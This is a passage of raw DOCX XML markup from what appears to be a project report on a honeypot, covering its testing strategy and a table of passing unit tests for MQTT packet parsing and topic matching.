          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Decision Table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify detection thresholds and alert de-duplication for every combination of conditions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="44D40E23" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Integration Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Grey-Box</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Confirm that services communicate correctly and data flows from the attacker to the database, the engine, the alerts and the dashboard.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="44D40E23" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Security Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Static analysis (bandit) and isolation checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Find insecure code patterns and confirm the honeypot stays passive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CF48B6F" w14:textId="54F0A1AE" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9036" w:name="_Toc69036"/>
      <w:r>
        <w:t xml:space="preserve">8.1 Unit Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9036"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unit testing validates each module in isolation. The automated suite (tests/test_parsers.py, tests/test_api.py and, new in v0.7, tests/test_v07.py) was run with pytest against PostgreSQL 16 and Redis 7; all 78 tests passed (31 parser, shell and MITRE tests, 12 API tests and 35 v0.7 tests). Without a database the 33 database-backed tests are skipped automatically. The 17 dashboard unit tests (vitest) also pass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">14</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Automated Unit Test Suite (pytest)</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000"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="5560"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w14:paraId="00C73242" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Unit under test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Test function(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="44D40E23" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MQTT remaining-length encode/decode (8 values incl. 127, 128, 16 383, 268 435 455)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">test_remaining_length_roundtrip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8 Passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="44D40E23" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MQTT packet larger than 127 bytes (the v0.3 defect)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">test_remaining_length_handles_large_packet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="44D40E23" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MQTT CONNECT credentials, bad protocol name, multi-topic SUBSCRIBE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">test_mqtt_connect_with_credentials, _rejects_bad_protocol, _subscribe_multiple_topics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3 Passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="44D40E23" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MQTT topic wildcard matching (+ and #, $SYS exclusion)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">test_topic_matching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7 Passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="44D40E23" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
